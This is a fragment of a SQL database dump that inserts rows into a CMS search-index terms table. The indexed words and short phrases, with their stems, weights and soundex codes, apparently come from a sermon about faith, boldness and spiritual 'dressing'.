(291596, 'a bold man', 'a bold man', 0, 1, 1.3333, 'A1435', 1, '*'),
(291597, 'a failure', 'a failure', 0, 1, 1.3, 'A146', 1, '*'),
(291598, 'a failure but', 'a failure but', 0, 1, 1.4333, 'A14613', 1, '*'),
(291599, 'a fight', 'a fight', 0, 1, 1.2333, 'A123', 1, '*'),
(291600, 'a fight but', 'a fight but', 0, 1, 1.3667, 'A12313', 1, '*'),
(291601, 'a future', 'a future', 0, 1, 1.2667, 'A136', 2, '*'),
(291602, 'a future carrying', 'a future carrying', 0, 1, 1.5667, 'A1362652', 1, '*'),
(291603, 'a future he', 'a future he', 0, 1, 1.3667, 'A136', 1, '*'),
(291604, 'a key', 'a key', 0, 1, 1.1667, 'A200', 1, '*'),
(291605, 'a key for', 'a key for', 0, 1, 1.3, 'A216', 1, '*'),
(291606, 'a life', 'a life', 0, 1, 1.2, 'A410', 1, '*'),
(291607, 'a life that', 'a life that', 0, 1, 1.3667, 'A413', 1, '*'),
(291608, 'a man of', 'a man of', 0, 1, 1.2667, 'A510', 1, '*'),
(291609, 'a man when', 'a man when', 0, 1, 1.3333, 'A500', 1, '*'),
(291610, 'a spirit of', 'a spirit of', 0, 1, 1.3667, 'A21631', 1, '*'),
(291611, 'a spirit the', 'a spirit the', 0, 1, 1.4, 'A2163', 1, '*'),
(291612, 'a spirit there', 'a spirit there', 0, 1, 1.4667, 'A21636', 1, '*'),
(291613, 'a thing of', 'a thing of', 0, 1, 1.3333, 'A3521', 1, '*'),
(291614, 'a winner', 'a winner', 0, 1, 1.2667, 'A560', 1, '*'),
(291615, 'a winner is', 'a winner is', 0, 1, 1.3667, 'A562', 1, '*'),
(291616, 'able to take', 'abl to take', 0, 1, 1.4, 'A1432', 1, '*'),
(291617, 'about making', 'about making', 0, 1, 1.4, 'A135252', 1, '*'),
(291618, 'about making face', 'about making face', 0, 1, 1.5667, 'A13525212', 1, '*'),
(291619, 'accountability', 'account', 0, 0, 0.9333, 'A253143', 1, '*'),
(291620, 'accountability be', 'account be', 0, 1, 1.5667, 'A2531431', 1, '*'),
(291621, 'accountability be ready', 'account be ready', 0, 1, 1.7667, 'A253143163', 1, '*'),
(291622, 'accountability is', 'account is', 0, 1, 1.5667, 'A2531432', 1, '*'),
(291623, 'accountability is the', 'account is the', 0, 1, 1.7, 'A25314323', 1, '*'),
(291624, 'accountability this', 'account this', 0, 1, 1.6333, 'A2531432', 1, '*'),
(291625, 'accountability this spirit', 'account this spirit', 0, 1, 1.8667, 'A2531432163', 1, '*'),
(291626, 'accuracy a', 'accuraci a', 0, 1, 1.3333, 'A262', 1, '*'),
(291627, 'accuracy a spirit', 'accuraci a spirit', 0, 1, 1.5667, 'A262163', 1, '*'),
(291628, 'accusation', 'accus', 0, 0, 0.6667, 'A235', 1, '*'),
(291629, 'accusation comes', 'accus comes', 0, 1, 1.5333, 'A235252', 1, '*'),
(291630, 'accusation comes the', 'accus comes the', 0, 1, 1.6667, 'A2352523', 1, '*'),
(291631, 'accusation let', 'accus let', 0, 1, 1.4667, 'A23543', 1, '*'),
(291632, 'accusation let your', 'accus let your', 0, 1, 1.6333, 'A235436', 1, '*'),
(291633, 'accuser', 'accus', 0, 0, 0.4667, 'A260', 1, '*'),
(291634, 'accuser the', 'accus the', 0, 1, 1.3667, 'A263', 1, '*'),
(291635, 'accuser the only', 'accus the only', 0, 1, 1.5333, 'A26354', 1, '*'),
(291636, 'accuser will', 'accus will', 0, 1, 1.4, 'A264', 1, '*'),
(291637, 'accuser will not', 'accus will not', 0, 1, 1.5333, 'A26453', 1, '*'),
(291638, 'afraid boldness', 'afraid boldness', 0, 1, 1.5, 'A16314352', 1, '*'),
(291639, 'afraid boldness is', 'afraid boldness is', 0, 1, 1.6, 'A16314352', 1, '*'),
(291640, 'all kind', 'all kind', 0, 1, 1.2667, 'A4253', 1, '*'),
(291641, 'all kind of', 'all kind of', 0, 1, 1.3667, 'A42531', 1, '*'),
(291642, 'all that it', 'all that it', 0, 1, 1.3667, 'A430', 1, '*'),
(291643, 'all these impartations', 'all these impartations', 0, 1, 1.7333, 'A432516352', 1, '*'),
(291644, 'all times while', 'all times while', 0, 1, 1.5, 'A43524', 1, '*'),
(291645, 'also carried', 'also carried', 0, 1, 1.4, 'A4263', 1, '*'),
(291646, 'also carried it', 'also carried it', 0, 1, 1.5, 'A4263', 1, '*'),
(291647, 'also determines', 'also determines', 0, 1, 1.5, 'A423652', 1, '*'),
(291648, 'also determines your', 'also determines your', 0, 1, 1.6667, 'A4236526', 1, '*'),
(291649, 'am ordained', 'am ordained', 0, 1, 1.3667, 'A56353', 1, '*'),
(291650, 'am ordained to', 'am ordained to', 0, 1, 1.4667, 'A56353', 1, '*'),
(291651, 'an event', 'an event', 0, 1, 1.2667, 'A5153', 1, '*'),
(291652, 'an event and', 'an event and', 0, 1, 1.4, 'A515353', 1, '*'),
(291653, 'an event but', 'an event but', 0, 1, 1.4, 'A515313', 1, '*'),
(291654, 'and 14', 'and 14', 0, 1, 1.2, 'A530', 1, '*'),
(291655, 'and 14 caleb', 'and 14 caleb', 0, 1, 1.4, 'A53241', 1, '*'),
(291656, 'and a spirit', 'and a spirit', 0, 1, 1.4, 'A532163', 1, '*'),
(291657, 'and covenants', 'and covenants', 0, 1, 1.4333, 'A5321532', 1, '*'),
(291658, 'and covenants will', 'and covenants will', 0, 1, 1.6, 'A53215324', 1, '*'),
(291659, 'and get better', 'and get better', 0, 1, 1.4667, 'A5323136', 1, '*'),
(291660, 'and great faith', 'and great faith', 0, 1, 1.5, 'A5326313', 1, '*'),
(291661, 'and he will', 'and he will', 0, 1, 1.3667, 'A534', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(291662, 'and hot', 'and hot', 0, 1, 1.2333, 'A530', 1, '*'),
(291663, 'and hot season', 'and hot season', 0, 1, 1.4667, 'A5325', 1, '*'),
(291664, 'and joshua', 'and joshua', 0, 1, 1.3333, 'A532', 1, '*'),
(291665, 'and joshua had', 'and joshua had', 0, 1, 1.4667, 'A5323', 1, '*'),
(291666, 'and season', 'and season', 0, 1, 1.3333, 'A5325', 1, '*'),
(291667, 'and season there', 'and season there', 0, 1, 1.5333, 'A532536', 1, '*'),
(291668, 'and status dressing', 'and status dressing', 0, 1, 1.6333, 'A5323236252', 1, '*'),
(291669, 'and then keep', 'and then keep', 0, 1, 1.4333, 'A53521', 1, '*'),
(291670, 'and there has', 'and there has', 0, 1, 1.4333, 'A5362', 1, '*'),
(291671, 'any matter', 'ani matter', 0, 1, 1.3333, 'A536', 1, '*'),
(291672, 'any matter the', 'ani matter the', 0, 1, 1.4667, 'A5363', 1, '*'),
(291673, 'are all kind', 'ar all kind', 0, 1, 1.4, 'A64253', 1, '*'),
(291674, 'are concerning', 'ar concerning', 0, 1, 1.4667, 'A6252652', 1, '*'),
(291675, 'are concerning any', 'ar concerning any', 0, 1, 1.6, 'A62526525', 1, '*'),
(291676, 'are dressing', 'ar dressing', 0, 1, 1.4, 'A636252', 1, '*'),
(291677, 'are dressing reflects', 'ar dressing reflects', 0, 1, 1.7, 'A636252614232', 1, '*'),
(291678, 'are not prepared', 'ar not prepared', 0, 1, 1.5333, 'A65316163', 1, '*'),
(291679, 'are pleasing', 'ar pleasing', 0, 1, 1.4, 'A614252', 1, '*'),
(291680, 'are pleasing god', 'ar pleasing god', 0, 1, 1.5333, 'A6142523', 1, '*'),
(291681, 'are ready', 'ar ready', 0, 1, 1.3, 'A630', 2, '*'),
(291682, 'are ready for', 'ar ready for', 0, 1, 1.4333, 'A6316', 1, '*'),
(291683, 'are spirits', 'ar spirits', 0, 1, 1.3667, 'A621632', 1, '*'),
(291684, 'are spirits you', 'ar spirits you', 0, 1, 1.5, 'A621632', 1, '*'),
(291685, 'are three kinds', 'ar three kinds', 0, 1, 1.5, 'A6362532', 1, '*'),
(291686, 'arena', 'arena', 0, 0, 0.3333, 'A650', 1, '*'),
(291687, 'arena of', 'arena of', 0, 1, 1.2667, 'A651', 1, '*'),
(291688, 'arena of life', 'arena of life', 0, 1, 1.4333, 'A65141', 1, '*'),
(291689, 'around you there', 'around you there', 0, 1, 1.5333, 'A6536', 1, '*'),
(291690, 'as garments', 'as garments', 0, 1, 1.3667, 'A26532', 1, '*'),
(291691, 'as garments in', 'as garments in', 0, 1, 1.4667, 'A265325', 1, '*'),
(291692, 'ask for', 'ask for', 0, 1, 1.2333, 'A216', 1, '*'),
(291693, 'ask for mountains', 'ask for mountains', 0, 1, 1.5667, 'A2165352', 1, '*'),
(291694, 'ask for valley', 'ask for valley', 0, 1, 1.4667, 'A21614', 1, '*'),
(291695, 'assures', 'assur', 0, 0, 0.4667, 'A262', 1, '*'),
(291696, 'assures victory', 'assur victory', 0, 1, 1.5, 'A2621236', 1, '*'),
(291697, 'assures victory every', 'assur victory every', 0, 1, 1.7, 'A262123616', 1, '*'),
(291698, 'attention to details', 'attent to details', 0, 1, 1.6667, 'A3535342', 1, '*'),
(291699, 'away from the', 'awai from the', 0, 1, 1.4333, 'A1653', 1, '*'),
(291700, 'be correctly', 'be correctly', 0, 1, 1.4, 'B26234', 1, '*'),
(291701, 'be correctly dressed', 'be correctly dressed', 0, 1, 1.6667, 'B262343623', 1, '*'),
(291702, 'be deceived', 'be deceived', 0, 1, 1.3667, 'B3213', 1, '*'),
(291703, 'be deceived it', 'be deceived it', 0, 1, 1.4667, 'B3213', 1, '*'),
(291704, 'be evil', 'be evil', 0, 1, 1.2333, 'B400', 1, '*'),
(291705, 'be evil reports', 'be evil reports', 0, 1, 1.5, 'B461632', 1, '*'),
(291706, 'be filled', 'be filled', 0, 1, 1.3, 'B430', 1, '*'),
(291707, 'be filled with', 'be filled with', 0, 1, 1.4667, 'B430', 1, '*'),
(291708, 'be ready before', 'be ready before', 0, 1, 1.5, 'B6316', 1, '*'),
(291709, 'because i am', 'becaus i am', 0, 1, 1.4, 'B250', 1, '*'),
(291710, 'been rain', 'been rain', 0, 1, 1.3, 'B565', 1, '*'),
(291711, 'been rain of', 'been rain of', 0, 1, 1.4, 'B5651', 1, '*'),
(291712, 'before god takes', 'befor god takes', 0, 1, 1.5333, 'B6232', 1, '*'),
(291713, 'before the accusation', 'befor the accusation', 0, 1, 1.7, 'B63235', 1, '*'),
(291714, 'believe deep', 'believ deep', 0, 1, 1.4, 'B4131', 1, '*'),
(291715, 'believe deep inside', 'believ deep inside', 0, 1, 1.6333, 'B4131523', 1, '*'),
(291716, 'beloved it', 'belov it', 0, 1, 1.3333, 'B413', 1, '*'),
(291717, 'beloved it is', 'belov it is', 0, 1, 1.4333, 'B4132', 1, '*'),
(291718, 'better don\'t', 'better don', 0, 1, 1.4, 'B36353', 1, '*'),
(291719, 'better don\'t spend', 'better don spend', 0, 1, 1.6, 'B363532153', 1, '*'),
(291720, 'better spirit', 'better spirit', 0, 1, 1.4333, 'B362163', 1, '*'),
(291721, 'better spirit of', 'better spirit of', 0, 1, 1.5333, 'B3621631', 1, '*'),
(291722, 'between an', 'between an', 0, 1, 1.3333, 'B350', 1, '*'),
(291723, 'between an event', 'between an event', 0, 1, 1.5333, 'B35153', 1, '*'),
(291724, 'bible says will', 'bibl says will', 0, 1, 1.5, 'B424', 1, '*'),
(291725, 'bold man', 'bold man', 0, 1, 1.2667, 'B435', 1, '*'),
(291726, 'bold man can', 'bold man can', 0, 1, 1.4, 'B43525', 1, '*'),
(291727, 'boldness', 'bold', 0, 0, 0.5333, 'B4352', 1, '*'),
(291728, 'boldness is', 'bold is', 0, 1, 1.3667, 'B4352', 1, '*'),
(291729, 'boldness is about', 'bold is about', 0, 1, 1.5667, 'B435213', 1, '*'),
(291730, 'bulk', 'bulk', 0, 0, 0.2667, 'B420', 1, '*'),
(291731, 'bulk of', 'bulk of', 0, 1, 1.2333, 'B421', 1, '*'),
(291732, 'bulk of your', 'bulk of your', 0, 1, 1.4, 'B4216', 1, '*'),
(291733, 'but a', 'but a', 0, 1, 1.1667, 'B300', 1, '*'),
(291734, 'but a man', 'but a man', 0, 1, 1.3, 'B350', 1, '*'),
(291735, 'but a winner', 'but a winner', 0, 1, 1.4, 'B356', 1, '*'),
(291736, 'but men with', 'but men with', 0, 1, 1.4, 'B353', 1, '*'),
(291737, 'but the minute', 'but the minute', 0, 1, 1.4667, 'B353', 1, '*'),
(291738, 'but the right', 'but the right', 0, 1, 1.4333, 'B3623', 1, '*'),
(291739, 'by faith you', 'by faith you', 0, 1, 1.4, 'B300', 1, '*'),
(291740, 'by your faith', 'by your faith', 0, 1, 1.4333, 'B613', 1, '*'),
(291741, 'caleb', 'caleb', 0, 0, 0.3333, 'C410', 1, '*'),
(291742, 'caleb and', 'caleb and', 0, 1, 1.3, 'C4153', 1, '*'),
(291743, 'caleb and joshua', 'caleb and joshua', 0, 1, 1.5333, 'C41532', 1, '*'),
(291744, 'caleb carried', 'caleb carried', 0, 1, 1.4333, 'C41263', 1, '*'),
(291745, 'caleb carried it', 'caleb carried it', 0, 1, 1.5333, 'C41263', 1, '*'),
(291746, 'call you all', 'call you all', 0, 1, 1.4, 'C400', 1, '*'),
(291747, 'can start', 'can start', 0, 1, 1.3, 'C52363', 1, '*'),
(291748, 'can start a', 'can start a', 0, 1, 1.3667, 'C52363', 1, '*'),
(291749, 'can take the', 'can take the', 0, 1, 1.4, 'C5323', 1, '*'),
(291750, 'cannot steal', 'cannot steal', 0, 1, 1.4, 'C53234', 1, '*'),
(291751, 'cannot steal spirit', 'cannot steal spirit', 0, 1, 1.6333, 'C532342163', 1, '*'),
(291752, 'carried it', 'carri it', 0, 1, 1.3333, 'C630', 1, '*'),
(291753, 'carried it paul', 'carri it paul', 0, 1, 1.5, 'C6314', 1, '*'),
(291754, 'carried it you', 'carri it you', 0, 1, 1.4667, 'C630', 1, '*'),
(291755, 'carried that', 'carri that', 0, 1, 1.4, 'C630', 1, '*'),
(291756, 'carried that spirit', 'carri that spirit', 0, 1, 1.6333, 'C632163', 1, '*'),
(291757, 'carry it spirit', 'carri it spirit', 0, 1, 1.5, 'C632163', 1, '*'),
(291758, 'carry the spirit', 'carri the spirit', 0, 1, 1.5333, 'C632163', 1, '*'),
(291759, 'carrying', 'carri', 0, 0, 0.5333, 'C652', 1, '*'),
(291760, 'carrying wrong', 'carri wrong', 0, 1, 1.4667, 'C652652', 1, '*'),
(291761, 'carrying wrong spirit', 'carri wrong spirit', 0, 1, 1.7, 'C652652163', 1, '*'),
(291762, 'causes a', 'caus a', 0, 1, 1.2667, 'C000', 1, '*'),
(291763, 'causes a man', 'caus a man', 0, 1, 1.4, 'C500', 1, '*'),
(291764, 'chapters', 'chapter', 0, 0, 0.5333, 'C1362', 1, '*'),
(291765, 'chapters 13', 'chapter 13', 0, 1, 1.3667, 'C1362', 1, '*'),
(291766, 'chapters 13 and', 'chapter 13 and', 0, 1, 1.5, 'C136253', 1, '*'),
(291767, 'cold season', 'cold season', 0, 1, 1.3667, 'C4325', 1, '*'),
(291768, 'cold season dress', 'cold season dress', 0, 1, 1.5667, 'C4325362', 1, '*'),
(291769, 'come it just', 'come it just', 0, 1, 1.4, 'C5323', 1, '*'),
(291770, 'comes the', 'come the', 0, 1, 1.3, 'C523', 1, '*'),
(291771, 'comes the spirit', 'come the spirit', 0, 1, 1.5333, 'C5232163', 1, '*'),
(291772, 'comes you', 'come you', 0, 1, 1.3, 'C520', 1, '*'),
(291773, 'comes you will', 'come you will', 0, 1, 1.4667, 'C524', 1, '*'),
(291774, 'concerning any', 'concern any', 0, 1, 1.4667, 'C526525', 1, '*'),
(291775, 'concerning any matter', 'concern any matter', 0, 1, 1.7, 'C52652536', 1, '*'),
(291776, 'concerning this', 'concern this', 0, 1, 1.5, 'C5265232', 1, '*'),
(291777, 'concerning this year', 'concern this year', 0, 1, 1.6667, 'C52652326', 1, '*'),
(291778, 'correctly dressed', 'correctli dressed', 0, 1, 1.5667, 'C62343623', 1, '*'),
(291779, 'correctly dressed in', 'correctli dressed in', 0, 1, 1.6667, 'C623436235', 1, '*'),
(291780, 'courage', 'courag', 0, 0, 0.4667, 'C620', 1, '*'),
(291781, 'courage is', 'courag is', 0, 1, 1.3333, 'C620', 1, '*'),
(291782, 'courage is a', 'courag is a', 0, 1, 1.4, 'C620', 1, '*'),
(291783, 'courage it\'s', 'courag it', 0, 1, 1.4, 'C6232', 1, '*'),
(291784, 'courage it\'s what', 'courag it what', 0, 1, 1.5667, 'C62323', 1, '*'),
(291785, 'courage willactually', 'courag willactually', 0, 1, 1.6667, 'C624234', 1, '*'),
(291786, 'courage willactually end', 'courag willactually end', 0, 1, 1.8, 'C62423453', 1, '*'),
(291787, 'covenants will', 'coven will', 0, 1, 1.4667, 'C15324', 1, '*'),
(291788, 'covenants will mark', 'coven will mark', 0, 1, 1.6333, 'C15324562', 1, '*'),
(291789, 'crucial to', 'crucial to', 0, 1, 1.3333, 'C6243', 1, '*'),
(291790, 'crucial to events', 'crucial to events', 0, 1, 1.5667, 'C62431532', 1, '*'),
(291791, 'crucial to occasions', 'crucial to occasions', 0, 1, 1.6667, 'C6243252', 1, '*'),
(291792, 'crucial to times', 'crucial to times', 0, 1, 1.5333, 'C624352', 1, '*'),
(291793, 'daniel carried', 'daniel carried', 0, 1, 1.4667, 'D54263', 1, '*'),
(291794, 'daniel carried that', 'daniel carried that', 0, 1, 1.6333, 'D54263', 1, '*'),
(291795, 'days but', 'dai but', 0, 1, 1.2667, 'D213', 1, '*'),
(291796, 'days but men', 'dai but men', 0, 1, 1.4, 'D2135', 1, '*'),
(291797, 'dearly beloved it', 'dearli beloved it', 0, 1, 1.5667, 'D641413', 1, '*'),
(291798, 'deceived it', 'deceiv it', 0, 1, 1.3667, 'D213', 1, '*'),
(291799, 'deceived it takes', 'deceiv it takes', 0, 1, 1.5667, 'D2132', 1, '*'),
(291800, 'deception', 'decept', 0, 0, 0.6, 'D2135', 1, '*'),
(291801, 'deception that', 'decept that', 0, 1, 1.4667, 'D21353', 1, '*'),
(291802, 'deception that the', 'decept that the', 0, 1, 1.6, 'D21353', 1, '*'),
(291803, 'deceptive', 'decept', 0, 0, 0.6, 'D2131', 1, '*'),
(291804, 'deceptive men', 'decept men', 0, 1, 1.4333, 'D21315', 1, '*'),
(291805, 'deceptive men in', 'decept men in', 0, 1, 1.5333, 'D21315', 1, '*'),
(291806, 'decide to', 'decid to', 0, 1, 1.3, 'D230', 1, '*'),
(291807, 'decide to join', 'decid to join', 0, 1, 1.4667, 'D2325', 1, '*'),
(291808, 'deep inside', 'deep inside', 0, 1, 1.3667, 'D1523', 1, '*'),
(291809, 'deep inside that', 'deep inside that', 0, 1, 1.5333, 'D1523', 1, '*'),
(291810, 'defeat', 'defeat', 0, 0, 0.4, 'D130', 1, '*'),
(291811, 'defeat caleb', 'defeat caleb', 0, 1, 1.4, 'D13241', 1, '*'),
(291812, 'defeat caleb carried', 'defeat caleb carried', 0, 1, 1.6667, 'D13241263', 1, '*'),
(291813, 'despite the situation', 'despit the situation', 0, 1, 1.7, 'D213235', 1, '*'),
(291814, 'details people', 'detail people', 0, 1, 1.4667, 'D4214', 1, '*'),
(291815, 'details people will', 'detail people will', 0, 1, 1.6333, 'D4214', 1, '*'),
(291816, 'determines your protections', 'determin your protections', 0, 1, 1.9, 'D65261632352', 1, '*'),
(291817, 'difference between an', 'differ between an', 0, 1, 1.7, 'D1652135', 1, '*'),
(291818, 'do is get', 'do is get', 0, 1, 1.3, 'D230', 1, '*'),
(291819, 'do it let', 'do it let', 0, 1, 1.3, 'D430', 1, '*'),
(291820, 'does not face', 'doe not face', 0, 1, 1.4333, 'D25312', 1, '*'),
(291821, 'does not say', 'doe not say', 0, 1, 1.4, 'D2532', 1, '*'),
(291822, 'doing whats', 'do whats', 0, 1, 1.3667, 'D5232', 1, '*'),
(291823, 'doing whats right', 'do whats right', 0, 1, 1.5667, 'D5232623', 1, '*'),
(291824, 'don\'t ask', 'don ask', 0, 1, 1.3, 'D532', 1, '*'),
(291825, 'don\'t ask for', 'don ask for', 0, 1, 1.4333, 'D53216', 1, '*'),
(291826, 'don\'t spend', 'don spend', 0, 1, 1.3667, 'D532153', 1, '*'),
(291827, 'don\'t spend the', 'don spend the', 0, 1, 1.5, 'D532153', 1, '*'),
(291828, 'draws you', 'draw you', 0, 1, 1.3, 'D620', 1, '*'),
(291829, 'draws you with', 'draw you with', 0, 1, 1.4667, 'D623', 1, '*'),
(291830, 'dress and', 'dress and', 0, 1, 1.3, 'D6253', 1, '*'),
(291831, 'dress and hot', 'dress and hot', 0, 1, 1.4333, 'D6253', 1, '*'),
(291832, 'dress dressing', 'dress dressing', 0, 1, 1.4667, 'D6236252', 1, '*'),
(291833, 'dress dressing is', 'dress dressing is', 0, 1, 1.5667, 'D6236252', 1, '*'),
(291834, 'dressed in', 'dress in', 0, 1, 1.3333, 'D6235', 1, '*'),
(291835, 'dressed in numbers', 'dress in numbers', 0, 1, 1.6, 'D6235162', 1, '*'),
(291836, 'dressing also', 'dress also', 0, 1, 1.4333, 'D625242', 1, '*'),
(291837, 'dressing also determines', 'dress also determines', 0, 1, 1.8, 'D6252423652', 1, '*'),
(291838, 'dressing god', 'dress god', 0, 1, 1.4, 'D62523', 1, '*'),
(291839, 'dressing god will', 'dress god will', 0, 1, 1.5667, 'D625234', 1, '*'),
(291840, 'dressing is', 'dress is', 0, 1, 1.3667, 'D6252', 1, '*'),
(291841, 'dressing is crucial', 'dress is crucial', 0, 1, 1.6333, 'D6252624', 1, '*'),
(291842, 'dressing reflects', 'dress reflects', 0, 1, 1.5667, 'D6252614232', 1, '*'),
(291843, 'dressing reflects positions', 'dress reflects positions', 0, 1, 1.9, 'D625261423212352', 1, '*'),
(291844, 'dressing reflects your', 'dress reflects your', 0, 1, 1.7333, 'D62526142326', 1, '*'),
(291845, 'dressing shows', 'dress shows', 0, 1, 1.4667, 'D6252', 1, '*'),
(291846, 'dressing shows who', 'dress shows who', 0, 1, 1.6, 'D6252', 1, '*'),
(291847, 'dressing to', 'dress to', 0, 1, 1.3667, 'D62523', 1, '*'),
(291848, 'dressing to possess', 'dress to possess', 0, 1, 1.6333, 'D6252312', 1, '*'),
(291849, 'dressings', 'dress', 0, 0, 0.6, 'D6252', 1, '*'),
(291850, 'dressings spirit', 'dress spirit', 0, 1, 1.5333, 'D6252163', 1, '*'),
(291851, 'dressings spirit of', 'dress spirit of', 0, 1, 1.6333, 'D62521631', 1, '*'),
(291852, 'end the', 'end the', 0, 1, 1.2333, 'E530', 1, '*'),
(291853, 'end the fight', 'end the fight', 0, 1, 1.4333, 'E53123', 1, '*'),
(291854, 'enemy cannot', 'enemi cannot', 0, 1, 1.4, 'E5253', 1, '*'),
(291855, 'enemy cannot steal', 'enemi cannot steal', 0, 1, 1.6, 'E5253234', 1, '*'),
(291856, 'enemy will', 'enemi will', 0, 1, 1.3333, 'E540', 1, '*'),
(291857, 'enemy will not', 'enemi will not', 0, 1, 1.4667, 'E5453', 1, '*'),
(291858, 'enemy “listen', 'enemi “listen', 0, 1, 1.4333, 'E54235', 1, '*'),
(291859, 'enemy “listen to', 'enemi “listen to', 0, 1, 1.5333, 'E542353', 1, '*'),
(291860, 'even when he', 'even when he', 0, 1, 1.4, 'E150', 1, '*'),
(291861, 'event and', 'event and', 0, 1, 1.3, 'E15353', 1, '*'),
(291862, 'event and a', 'event and a', 0, 1, 1.3667, 'E15353', 1, '*'),
(291863, 'event but', 'event but', 0, 1, 1.3, 'E15313', 1, '*'),
(291864, 'event but a', 'event but a', 0, 1, 1.3667, 'E15313', 1, '*'),
(291865, 'events', 'event', 0, 0, 0.4, 'E1532', 1, '*'),
(291866, 'events dressing', 'event dressing', 0, 1, 1.5, 'E153236252', 1, '*'),
(291867, 'events dressing shows', 'event dressing shows', 0, 1, 1.7, 'E153236252', 1, '*'),
(291868, 'every time winning', 'everi time winning', 0, 1, 1.6, 'E16352', 1, '*'),
(291869, 'evil deception', 'evil deception', 0, 1, 1.4667, 'E1432135', 1, '*'),
(291870, 'evil deception that', 'evil deception that', 0, 1, 1.6333, 'E14321353', 1, '*'),
(291871, 'evil reports', 'evil reports', 0, 1, 1.4, 'E1461632', 1, '*'),
(291872, 'evil reports but', 'evil reports but', 0, 1, 1.5333, 'E146163213', 1, '*'),
(291873, 'expressly', 'expressli', 0, 0, 0.6, 'E21624', 1, '*'),
(291874, 'expressly to', 'expressli to', 0, 1, 1.4, 'E216243', 1, '*'),
(291875, 'expressly to us', 'expressli to us', 0, 1, 1.5, 'E2162432', 1, '*'),
(291876, 'face courage', 'face courage', 0, 1, 1.4, 'F262', 1, '*'),
(291877, 'face courage is', 'face courage is', 0, 1, 1.5, 'F262', 1, '*'),
(291878, 'face is', 'face is', 0, 1, 1.2333, 'F200', 1, '*'),
(291879, 'face is a', 'face is a', 0, 1, 1.3, 'F200', 1, '*'),
(291880, 'face the', 'face the', 0, 1, 1.2667, 'F230', 1, '*'),
(291881, 'face the accuser', 'face the accuser', 0, 1, 1.5333, 'F2326', 1, '*'),
(291882, 'failure but', 'failur but', 0, 1, 1.3667, 'F4613', 1, '*'),
(291883, 'failure but the', 'failur but the', 0, 1, 1.5, 'F4613', 1, '*'),
(291884, 'faith and great', 'faith and great', 0, 1, 1.5, 'F353263', 1, '*'),
(291885, 'faith god', 'faith god', 0, 1, 1.3, 'F323', 1, '*'),
(291886, 'faith god gave', 'faith god gave', 0, 1, 1.4667, 'F32321', 1, '*'),
(291887, 'faith little', 'faith little', 0, 1, 1.4, 'F3434', 1, '*'),
(291888, 'faith little faith', 'faith little faith', 0, 1, 1.6, 'F343413', 1, '*'),
(291889, 'faith that nature', 'faith that nature', 0, 1, 1.5667, 'F3536', 1, '*'),
(291890, 'faith the', 'faith the', 0, 1, 1.3, 'F300', 1, '*'),
(291891, 'faith the bible', 'faith the bible', 0, 1, 1.5, 'F314', 1, '*'),
(291892, 'faith there are', 'faith there are', 0, 1, 1.5, 'F360', 1, '*'),
(291893, 'faith when', 'faith when', 0, 1, 1.3333, 'F350', 1, '*'),
(291894, 'faith when the', 'faith when the', 0, 1, 1.4667, 'F353', 1, '*'),
(291895, 'fast to', 'fast to', 0, 1, 1.2333, 'F230', 1, '*'),
(291896, 'fast to the', 'fast to the', 0, 1, 1.3667, 'F230', 1, '*'),
(291897, 'father s hearth', 'father s hearth', 0, 1, 1.5, 'F36263', 1, '*'),
(291898, 'father\'s heart 08', 'father heart 08', 0, 1, 1.5667, 'F36263', 1, '*'),
(291899, 'fight before', 'fight before', 0, 1, 1.4, 'F2316', 1, '*'),
(291900, 'fight before god', 'fight before god', 0, 1, 1.5333, 'F231623', 1, '*'),
(291901, 'fight but', 'fight but', 0, 1, 1.3, 'F2313', 1, '*'),
(291902, 'fight but a', 'fight but a', 0, 1, 1.3667, 'F2313', 1, '*'),
(291903, 'filled with faith', 'fill with faith', 0, 1, 1.5667, 'F4313', 1, '*'),
(291904, 'following dressings', 'follow dressings', 0, 1, 1.6333, 'F45236252', 1, '*'),
(291905, 'following dressings spirit', 'follow dressings spirit', 0, 1, 1.8667, 'F45236252163', 1, '*'),
(291906, 'for dressing', 'for dressing', 0, 1, 1.4, 'F636252', 1, '*'),
(291907, 'for dressing is', 'for dressing is', 0, 1, 1.5, 'F636252', 1, '*'),
(291908, 'for he', 'for he', 0, 1, 1.2, 'F600', 1, '*'),
(291909, 'for he will', 'for he will', 0, 1, 1.3667, 'F640', 1, '*'),
(291910, 'for mountains', 'for mountains', 0, 1, 1.4333, 'F65352', 1, '*'),
(291911, 'for mountains spirit', 'for mountains spirit', 0, 1, 1.6667, 'F65352163', 1, '*'),
(291912, 'for the accusation', 'for the accusation', 0, 1, 1.6, 'F63235', 1, '*'),
(291913, 'for this', 'for this', 0, 1, 1.2667, 'F632', 3, '*'),
(291914, 'for this year', 'for this year', 0, 1, 1.4333, 'F6326', 1, '*'),
(291915, 'for valley', 'for valley', 0, 1, 1.3333, 'F614', 1, '*'),
(291916, 'for valley in', 'for valley in', 0, 1, 1.4333, 'F6145', 1, '*'),
(291917, 'from the promised', 'from the promised', 0, 1, 1.5667, 'F65316523', 1, '*'),
(291918, 'funny names', 'funni names', 0, 1, 1.3667, 'F520', 1, '*'),
(291919, 'funny names but', 'funni names but', 0, 1, 1.5, 'F5213', 1, '*'),
(291920, 'future carrying', 'futur carrying', 0, 1, 1.5, 'F362652', 1, '*'),
(291921, 'future carrying wrong', 'futur carrying wrong', 0, 1, 1.7, 'F362652652', 1, '*'),
(291922, 'future he', 'futur he', 0, 1, 1.3, 'F360', 1, '*'),
(291923, 'future he works', 'futur he works', 0, 1, 1.5, 'F362', 1, '*'),
(291924, 'future nobody', 'futur nobody', 0, 1, 1.4333, 'F36513', 1, '*'),
(291925, 'future nobody has', 'futur nobody has', 0, 1, 1.5667, 'F365132', 1, '*'),
(291926, 'garments', 'garment', 0, 0, 0.5333, 'G6532', 1, '*'),
(291927, 'garments in', 'garment in', 0, 1, 1.3667, 'G65325', 1, '*'),
(291928, 'garments in 2017', 'garment in 2017', 0, 1, 1.5333, 'G65325', 1, '*'),
(291929, 'gave us', 'gave us', 0, 1, 1.2333, 'G120', 1, '*'),
(291930, 'gave us a', 'gave us a', 0, 1, 1.3, 'G120', 1, '*'),
(291931, 'get better', 'get better', 0, 1, 1.3333, 'G3136', 1, '*'),
(291932, 'get better don\'t', 'get better don', 0, 1, 1.5333, 'G3136353', 1, '*'),
(291933, 'get ready', 'get ready', 0, 1, 1.3, 'G363', 1, '*'),
(291934, 'get ready for', 'get ready for', 0, 1, 1.4333, 'G36316', 1, '*'),
(291935, 'get ready to', 'get ready to', 0, 1, 1.4, 'G363', 1, '*'),
